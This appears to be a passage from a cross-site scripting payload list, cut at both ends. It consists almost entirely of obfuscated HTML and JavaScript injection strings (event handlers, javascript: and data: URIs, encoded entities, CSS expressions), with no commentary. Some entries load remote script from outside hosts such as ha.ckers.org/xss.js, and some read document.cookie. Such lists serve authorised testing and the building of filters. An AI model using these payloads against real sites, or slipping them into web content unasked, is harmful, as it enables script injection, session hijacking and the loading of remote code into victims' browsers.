onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a + +<img/src=@&#32;&#13; onerror = prompt('&#49;') + +<style/onload=prompt&#40;'&#88;&#83;&#83;'&#41; + +<script ^__^>alert(String.fromCharCode(49))</script ^__^ + +</style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-( + +&#00;</form><input type&#61;"date" onfocus="alert(1)"> + +<form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'> + +<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ + +<iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'> + +<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a> + +<script ~~~>alert(0%0)</script ~~~> + +<style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;> + +<///style///><span %2F 
onmousemove='alert&lpar;1&rpar;'>SPAN + +<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1) + +&#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>' + +&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera} + +<marquee onstart='javascript:alert&#x28;1&#x29;'>^__^ + +<div/style="width:expression(confirm(1))">X</div> {IE7} + +<iframe/%00/ src=javaSCRIPT&colon;alert(1) + +//<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>// + +/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> + +//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ + +</font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style> + +<a/href="javascript:&#13; javascript:prompt(1)"><input type="X"> + +</plaintext\></|\><plaintext/onmouseover=prompt(1) + +</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera} + +<a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button> + +<div onmouseover='alert&lpar;1&rpar;'>DIV</div> + +<iframe style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> + +<a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a> + +<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> + +<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> + +<var onmouseover="prompt(1)">On Mouse Over</var> + +<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a> + +<img src="/" =_=" title="onerror='prompt(1)'"> + +<%<!--'%><script>alert(1);</script --> + +<script src="data:text/javascript,alert(1)"></script> +<iframe/src \/\/onload = prompt(1) + +<iframe/onreadystatechange=alert(1) + +<svg/onload=alert(1) + +<input value=<><iframe/src=javascript:confirm(1) + +<input type="text" value=`` <div/onmouseover='alert(1)'>X</div> + 
+http://www.<script>alert(1)</script .com + +<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> + +<svg><script ?>alert(1) + +<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe> + +<img src=`xx:xx`onerror=alert(1)> + +<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/> +<math><a xlink:href="//jsfiddle.net/t846h/">click + +<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> +<svg contentScriptType=text/vbs><script>MsgBox+1 + +<a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a + +<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> + +<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. 
\u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ + +<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F +<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script + +<object data=javascript&colon;\u0061&#x6C;&#101%72t(1)> + +<script>+-+-1-+-+alert(1)</script> + +<body/onload=&lt;!--&gt;&#10alert(1)> + +<script itworksinallbrowsers>/*<script* */alert(1)</script + +<img src ?itworksonchrome?\/onerror = alert(1) + +<svg><script>//&NewLine;confirm(1);</script </svg> +<svg><script onlypossibleinopera:-)> alert(1) + +<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe + +<script x> alert(1) </script 1=2 + +<div/onmouseover='alert(1)'> style="x:"> + +<--`<img/src=` onerror=alert(1)> --!> + <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> + +<div style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button> + +"><img src=x onerror=window.open('https://www.google.com/');> + +<form><button formaction=javascript&colon;alert(1)>CLICKME + +<math><a xlink:href="//jsfiddle.net/t846h/">click + +<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> + +<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> + +<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a> + +<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT> 
+;alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//></SCRIPT>>><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +<IMG ><SCRIPT>alert(XSS)</SCRIPT>> +<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> +<IMG SRC=jav ascript:alert(XSS);> +<IMG SRC=jav&#x09;ascript:alert(XSS);> +<<SCRIPT>alert(XSS);//<</SCRIPT> +%253cscript%253ealert(1)%253c/script%253e +><s%2bcript>alert(document.cookie)</script> +foo<script>alert(1)</script> +<scr<script>ipt>alert(1)</scr</script>ipt> +<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> +<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> +<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> +<BODY BACKGROUND=javascript:alert(XSS)> +<BODY ONLOAD=alert(XSS)> +<INPUT TYPE=IMAGE SRC=javascript:alert(XSS);> +<IMG SRC=javascript:alert(XSS) +<iframe src=http://ha.ckers.org/scriptlet.html < +javascript:alert("hellox worldss") +<img src="javascript:alert('XSS');"> +<img src=javascript:alert(&quot;XSS&quot;)> +<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> +<IFRAME SRC="javascript:alert('XSS');"></IFRAME> +<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs 
aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> +<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<<SCRIPT>alert("XSS");//<</SCRIPT> +<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search +<script>alert("hellox worldss")</script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510 +<script>alert("XSS");</script>&search=1 +0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-frmGoogleWeb=Web+Search +<h1><font color=blue>hellox worldss</h1> +<BODY ONLOAD=alert('hellox worldss')> +<input onfocus=write(XSS) autofocus> +<input onblur=write(XSS) autofocus><input autofocus> +<body onscroll=alert(XSS)><br><br><br><br><br><br>...<br><br><br><br><input autofocus> +<form><button formaction="javascript:alert(XSS)">lol +<!--<img src="--><img src=x onerror=alert(XSS)//"> +<![><img src="]><img src=x onerror=alert(XSS)//"> +<style><img src="</style><img src=x onerror=alert(XSS)//"> 
+<? foo="><script>alert(1)</script>"> +<! foo="><script>alert(1)</script>"> +</ foo="><script>alert(1)</script>"> +<? foo="><x foo='?><script>alert(1)</script>'>"> +<! foo="[[[Inception]]"><x foo="]foo><script>alert(1)</script>"> +<% foo><x foo="%><script>alert(123)</script>"> +<div style="font-family:'foo&#10;;color:red;';">LOL +LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style> +<script>({0:#0=alert/#0#/#0#(0)})</script> +<svg xmlns="http://www.w3.org/2000/svg">LOL<script>alert(123)</script></svg> +&lt;SCRIPT&gt;alert(/XSS/&#46;source)&lt;/SCRIPT&gt; +\\";alert('XSS');// +&lt;/TITLE&gt;&lt;SCRIPT&gt;alert(\"XSS\");&lt;/SCRIPT&gt; +&lt;INPUT TYPE=\"IMAGE\" SRC=\"javascript&#058;alert('XSS');\"&gt; +&lt;BODY BACKGROUND=\"javascript&#058;alert('XSS')\"&gt; +&lt;BODY ONLOAD=alert('XSS')&gt; +&lt;IMG DYNSRC=\"javascript&#058;alert('XSS')\"&gt; +&lt;IMG LOWSRC=\"javascript&#058;alert('XSS')\"&gt; +&lt;BGSOUND SRC=\"javascript&#058;alert('XSS');\"&gt; +&lt;BR SIZE=\"&{alert('XSS')}\"&gt; +&lt;LAYER SRC=\"http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\"&gt;&lt;/LAYER&gt; +&lt;LINK REL=\"stylesheet\" HREF=\"javascript&#058;alert('XSS');\"&gt; +&lt;LINK REL=\"stylesheet\" HREF=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;css\"&gt; +&lt;STYLE&gt;@import'http&#58;//ha&#46;ckers&#46;org/xss&#46;css';&lt;/STYLE&gt; +&lt;META HTTP-EQUIV=\"Link\" Content=\"&lt;http&#58;//ha&#46;ckers&#46;org/xss&#46;css&gt;; REL=stylesheet\"&gt; +&lt;STYLE&gt;BODY{-moz-binding&#58;url(\"http&#58;//ha&#46;ckers&#46;org/xssmoz&#46;xml#xss\")}&lt;/STYLE&gt; +&lt;XSS STYLE=\"behavior&#58; url(xss&#46;htc);\"&gt; +&lt;STYLE&gt;li {list-style-image&#58; url(\"javascript&#058;alert('XSS')\");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS +&lt;IMG SRC='vbscript&#058;msgbox(\"XSS\")'&gt; +&lt;IMG SRC=\"mocha&#58;&#91;code&#93;\"&gt; +&lt;IMG SRC=\"livescript&#058;&#91;code&#93;\"&gt; +scriptualert(EXSSE)/scriptu +&lt;META HTTP-EQUIV=\"refresh\" 
CONTENT=\"0;url=javascript&#058;alert('XSS');\"&gt; +&lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data&#58;text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\"&gt; +&lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http&#58;//;URL=javascript&#058;alert('XSS');\" +&lt;IFRAME SRC=\"javascript&#058;alert('XSS');\"&gt;&lt;/IFRAME&gt; +&lt;FRAMESET&gt;&lt;FRAME SRC=\"javascript&#058;alert('XSS');\"&gt;&lt;/FRAMESET&gt; +&lt;TABLE BACKGROUND=\"javascript&#058;alert('XSS')\"&gt; +&lt;TABLE&gt;&lt;TD BACKGROUND=\"javascript&#058;alert('XSS')\"&gt; +&lt;DIV STYLE=\"background-image&#58; url(javascript&#058;alert('XSS'))\"&gt; +&lt;DIV STYLE=\"background-image&#58;\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028&#46;1027\0058&#46;1053\0053\0027\0029'\0029\"&gt; +&lt;DIV STYLE=\"background-image&#58; url(javascript&#058;alert('XSS'))\"&gt; +&lt;DIV STYLE=\"width&#58; expression(alert('XSS'));\"&gt; +&lt;STYLE&gt;@im\port'\ja\vasc\ript&#58;alert(\"XSS\")';&lt;/STYLE&gt; +&lt;IMG STYLE=\"xss&#58;expr/*XSS*/ession(alert('XSS'))\"&gt; +&lt;XSS STYLE=\"xss&#58;expression(alert('XSS'))\"&gt; +exp/*&lt;A STYLE='no\xss&#58;noxss(\"*//*\"); +xss&#58;ex&#x2F;*XSS*//*/*/pression(alert(\"XSS\"))'&gt; +&lt;STYLE TYPE=\"text/javascript\"&gt;alert('XSS');&lt;/STYLE&gt; +&lt;STYLE&gt;&#46;XSS{background-image&#58;url(\"javascript&#058;alert('XSS')\");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt; +&lt;STYLE type=\"text/css\"&gt;BODY{background&#58;url(\"javascript&#058;alert('XSS')\")}&lt;/STYLE&gt; +&lt;!--&#91;if gte IE 4&#93;&gt; +&lt;SCRIPT&gt;alert('XSS');&lt;/SCRIPT&gt; +&lt;!&#91;endif&#93;--&gt; +&lt;BASE HREF=\"javascript&#058;alert('XSS');//\"&gt; +&lt;OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\"&gt;&lt;/OBJECT&gt; +&lt;OBJECT classid=clsid&#58;ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript&#058;alert('XSS')&gt;&lt;/OBJECT&gt; +&lt;EMBED 
SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;swf\" AllowScriptAccess=\"always\"&gt;&lt;/EMBED&gt; +&lt;EMBED SRC=\"data&#58;image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"&gt;&lt;/EMBED&gt; +a=\"get\"; +b=\"URL(\\"\"; +c=\"javascript&#058;\"; +d=\"alert('XSS');\\")\"; +eval(a+b+c+d); +&lt;HTML xmlns&#58;xss&gt;&lt;?import namespace=\"xss\" implementation=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;htc\"&gt;&lt;xss&#58;xss&gt;XSS&lt;/xss&#58;xss&gt;&lt;/HTML&gt; +&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;!&#91;CDATA&#91;&lt;IMG SRC=\"javas&#93;&#93;&gt;&lt;!&#91;CDATA&#91;cript&#58;alert('XSS');\"&gt;&#93;&#93;&gt; +&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt; +&lt;XML ID=\"xss\"&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=\"javas&lt;!-- --&gt;cript&#58;alert('XSS')\"&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt; +&lt;SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"&gt;&lt;/SPAN&gt; +&lt;XML SRC=\"xsstest&#46;xml\" ID=I&gt;&lt;/XML&gt; +&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt; +&lt;HTML&gt;&lt;BODY&gt; +&lt;?xml&#58;namespace prefix=\"t\" ns=\"urn&#58;schemas-microsoft-com&#58;time\"&gt; +&lt;?import namespace=\"t\" implementation=\"#default#time2\"&gt; +&lt;t&#58;set attributeName=\"innerHTML\" to=\"XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;\"&gt; +&lt;/BODY&gt;&lt;/HTML&gt; +&lt;SCRIPT SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;jpg\"&gt;&lt;/SCRIPT&gt; +&lt;!--#exec cmd=\"/bin/echo '&lt;SCR'\"--&gt;&lt;!--#exec cmd=\"/bin/echo 'IPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt;'\"--&gt; +&lt;? 
echo('&lt;SCR)'; +echo('IPT&gt;alert(\"XSS\")&lt;/SCRIPT&gt;'); ?&gt; +&lt;IMG SRC=\"http&#58;//www&#46;thesiteyouareon&#46;com/somecommand&#46;php?somevariables=maliciouscode\"&gt; +Redirect 302 /a&#46;jpg http&#58;//victimsite&#46;com/admin&#46;asp&deleteuser +&lt;META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;\"&gt; +&lt;HEAD&gt;&lt;META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- +&lt;SCRIPT a=\"&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT =\"&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT a=\"&gt;\" '' SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT \"a='&gt;'\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT a=`&gt;` SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT a=\"&gt;'&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT&gt;document&#46;write(\"&lt;SCRI\");&lt;/SCRIPT&gt;PT SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; +&lt;A HREF=\"http&#58;//66&#46;102&#46;7&#46;147/\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"http&#58;//%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"http&#58;//1113982867/\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"http&#58;//0x42&#46;0x0000066&#46;0x7&#46;0x93/\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"http&#58;//0102&#46;0146&#46;0007&#46;00000223/\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"htt p&#58;//6 6&#46;000146&#46;0x7&#46;147/\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"//www&#46;google&#46;com/\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"//google\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"http&#58;//ha&#46;ckers&#46;org@google\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"http&#58;//google&#58;ha&#46;ckers&#46;org\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"http&#58;//google&#46;com/\"&gt;XSS&lt;/A&gt; +&lt;A 
HREF=\"http&#58;//www&#46;google&#46;com&#46;/\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"javascript&#058;document&#46;location='http&#58;//www&#46;google&#46;com/'\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"http&#58;//www&#46;gohttp&#58;//www&#46;google&#46;com/ogle&#46;com/\"&gt;XSS&lt;/A&gt; +&lt; +%3C +&lt +&lt; +&LT +&LT; +&#60 +&#060 +&#0060 +&#00060 +&#000060 +&#0000060 +&lt; +&#x3c +&#x03c +&#x003c +&#x0003c +&#x00003c +&#x000003c +&#x3c; +&#x03c; +&#x003c; +&#x0003c; +&#x00003c; +&#x000003c; +&#X3c +&#X03c +&#X003c +&#X0003c +&#X00003c +&#X000003c +&#X3c; +&#X03c; +&#X003c; +&#X0003c; +&#X00003c; +&#X000003c; +&#x3C +&#x03C +&#x003C +&#x0003C +&#x00003C +&#x000003C +&#x3C; +&#x03C; +&#x003C; +&#x0003C; +&#x00003C; +&#x000003C; +&#X3C +&#X03C +&#X003C +&#X0003C +&#X00003C +&#X000003C +&#X3C; +&#X03C; +&#X003C; +&#X0003C; +&#X00003C; +&#X000003C; +\x3c +\x3C +\u003c +\u003C +&lt;iframe src=http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html&gt; +&lt;IMG SRC=\"javascript&#058;alert('XSS')\" +&lt;SCRIPT SRC=//ha&#46;ckers&#46;org/&#46;js&gt; +&lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js?&lt;B&gt; +&lt;&lt;SCRIPT&gt;alert(\"XSS\");//&lt;&lt;/SCRIPT&gt; +&lt;SCRIPT/SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; +&lt;BODY onload!#$%&()*~+-_&#46;,&#58;;?@&#91;/|\&#93;^`=alert(\"XSS\")&gt; +&lt;SCRIPT/XSS SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; +&lt;IMG SRC=\" javascript&#058;alert('XSS');\"&gt; +perl -e 'print \"&lt;SCR\0IPT&gt;alert(\\"XSS\\")&lt;/SCR\0IPT&gt;\";' &gt; out +perl -e 'print \"&lt;IMG SRC=java\0script&#058;alert(\\"XSS\\")&gt;\";' &gt; out +&lt;IMG SRC=\"jav&#x0D;ascript&#058;alert('XSS');\"&gt; +&lt;IMG SRC=\"jav&#x0A;ascript&#058;alert('XSS');\"&gt; +&lt;IMG SRC=\"jav&#x09;ascript&#058;alert('XSS');\"&gt; +&lt;IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29&gt; +&lt;IMG 
SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041&gt; +&lt;IMG SRC=javascript&#058;alert('XSS')&gt; +&lt;IMG SRC=javascript&#058;alert(String&#46;fromCharCode(88,83,83))&gt; +&lt;IMG \"\"\"&gt;&lt;SCRIPT&gt;alert(\"XSS\")&lt;/SCRIPT&gt;\"&gt; +&lt;IMG SRC=`javascript&#058;alert(\"RSnake says, 'XSS'\")`&gt; +&lt;IMG SRC=javascript&#058;alert(&quot;XSS&quot;)&gt; +&lt;IMG SRC=JaVaScRiPt&#058;alert('XSS')&gt; +&lt;IMG SRC=javascript&#058;alert('XSS')&gt; +&lt;IMG SRC=\"javascript&#058;alert('XSS');\"&gt; +&lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt; +'';!--\"&lt;XSS&gt;=&{()} +';alert(String&#46;fromCharCode(88,83,83))//\';alert(String&#46;fromCharCode(88,83,83))//\";alert(String&#46;fromCharCode(88,83,83))//\\";alert(String&#46;fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;\"&gt;'&gt;&lt;SCRIPT&gt;alert(String&#46;fromCharCode(88,83,83))&lt;/SCRIPT&gt; +';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +'';!--"<XSS>=&{()} +<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> +<IMG SRC="javascript:alert('XSS');"> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=javascrscriptipt:alert('XSS')> +<IMG SRC=JaVaScRiPt:alert('XSS')> +<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> +<IMG SRC=" &#14; javascript:alert('XSS');"> +<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<<SCRIPT>alert("XSS");//<</SCRIPT> +<SCRIPT>a=/XSS/alert(a.source)</SCRIPT> +\";alert('XSS');// +</TITLE><SCRIPT>alert("XSS");</SCRIPT> +scriptalert(XSS)/script +<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> +<IFRAME 